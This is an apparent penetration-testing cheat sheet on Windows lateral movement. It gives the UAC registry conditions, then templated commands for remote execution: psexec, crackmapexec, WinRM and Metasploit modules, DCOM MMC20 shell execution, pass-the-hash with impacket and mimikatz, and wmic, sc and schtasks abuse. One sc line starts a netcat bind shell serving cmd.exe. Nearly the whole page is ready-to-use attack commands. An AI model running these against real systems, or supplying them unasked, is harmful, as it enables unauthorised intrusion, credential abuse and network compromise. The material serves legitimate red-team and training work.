Lateral Movement

Theory

info

It is not possible to use local administrator account for lateral movement if:

EnableLUA = 1
LocalAccountTokenFilterPolicy = 0
FilterAdministratorToken = 1

If FilterAdministratorToken = 0 and the other values are the same, only the RID 500 admin local account can be used for lateral movement.

In all other cases it is possible to use local administrator account for lateral movement.

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\FilterAdministratorToken

Authenticated RCE

SMB

.\psexec64.exe \\<ip> -u .\<administrator> -p <password> [-c <malware.exe>] -s -accepteula

crackmapexec <ip> -u <user> -p <password> -d <domain> -<x|X> <command>

WinRM

From Windows

winrs -r:http://<ip>/wsman "<cmd>"

From Kali

auxiliary/scanner/winrm/winrm_auth_methods
auxiliary/scanner/winrm/winrm_login 
auxiliary/scanner/winrm/winrm_cmd
exploit/windows/winrm/winrm_script_exec

DCOM with MMC application through RPC

https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

$COM = [activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.APPLICATION", "<ip>"))
$COM.Document.ActiveView.ExecuteShellCommand("<C:\Windows\System32\calc.exe>", $Null, $Null, "7")

[System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application","<ip>")).Document.ActiveView.ExecuteShellCommand("c:\windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe",$null,"\\<ip>\$

./dcomexec.py <domain>/<user>:<password>@<ip> <cmd>

Pass-The-Hash

tip

If NTLM only you can add padding:

00000000000000000000000000000000:8845f7eaee8fb117ad06bdd830b7586c

crackmapexec <ip> -u <user> -H "<lm>" -x "<msfvenom psh-cmd>"
impacket-wmiexec <user>@<ip> -hashes <lm:nt>
pth-winexe -U <user>%<ntlm> //<ip> "<msfvenom psh-cmd>"
wmic -U <domain/><adminuser>%<password> //<host> "<cmd>"
wmis -U <domain/><adminuser>%<password> //<host> "<cmd>"
python wmiexec.py -hashes :<hash> <user>@<ip>
sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<lm> /run:<cmd>
kiwi_cmd "\"sekurlsa::pth /user:<user> /domain:<domain> /ntlm:<lm> /run:cmd.exe\""
xfreerdp /u:<user> /d:<domain> /pth:<ntlm> /v:<ip>:3389 /dynamic-resolution
use exploit/windows/smb/psexec

https://github.com/Kevin-Robertson/Invoke-TheHash

Remote invoke executable

From attacker machine

wmic /node:<targetip> /user:<admin_user> /password:<password> process call create <command>
wmic /node:@<list_targetip.txt> /user:<admin_user> /password:<password> process call create <command>

Option 1

1. Establish SMB session

net use \\<targetip> <password> /u:<domain\username>

2. Dodging the 30-second dilemma

sc \\<targetip> create <service_name> binpath= "cmd.exe /k <command>"
sc \\<targetip> create <service_name> binpath= "cmd.exe /k <c:\tools\nc.exe -L -p <port> -e cmd.exe>"
sc \\<targetip> start <service_name>

Option 2

1. Establish SMB session

net use \\<targetip> <password> /u:<domain\username>

2. Verify that the Schedule service is running and start it if not

sc \\<targetip> query schedule
sc \\<targetip> start schedule

3. Check the current local time on the target machine

net time \\<targetip>

4. Schedule the job

schtasks /create /tn <taskname> /s <targetip> /u <user> /p <password> /sc <frequency> /st <HH:MM:SS> /sd <startdate> /tr <command>

at \\<targetip> <HH:MM> <A/P> <command>

5. Verify the job status

schtasks /query /s <targetip>

at \\<targetip>

From compromised machine

\\<share>\<exe>

Target another machine using the credentials of the compromised host.

run schtasksabuse -c "<command1>(,command2)" -t <targetip>

Theory​

Authenticated RCE​

SMB​

WinRM​

DCOM with MMC application through RPC​

Pass-The-Hash​

Remote invoke executable​

From attacker machine​

Option 1​

Option 2​

From compromised machine​